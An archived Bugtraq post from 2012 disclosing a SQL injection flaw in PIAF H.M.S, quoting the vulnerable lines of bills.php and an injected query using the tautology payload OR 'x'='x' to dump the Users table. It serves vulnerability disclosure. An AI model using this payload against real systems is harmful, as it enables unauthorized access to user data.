Bugtraq mailing list archives
PIAF H.M.S - SQL Injection
From: Michał Błaszczak <blaszczakm () gmail com>
Date: Sun, 28 Oct 2012 13:29:31 +0100
# Exploit Title: PIAF H.M.S - SQL Injection # Date: 28/10/2012 # Author: Michał Błaszczak # Website: http://blaszczakm.blogspot.com # Vendor Homepage: http://code.google.com/p/piafhms/ file: bills.php line: 86-87 $query = $query . " ORDER BY ID DESC"; printf($query); query: SELECT * FROM `Users` WHERE `Room` = 'anything' OR 'x'='x' ORDER BY ID DESC Michał Błaszczak blaszczakm.blogspot.com
Current thread:
- PIAF H.M.S - SQL Injection Michał Błaszczak (Oct 29)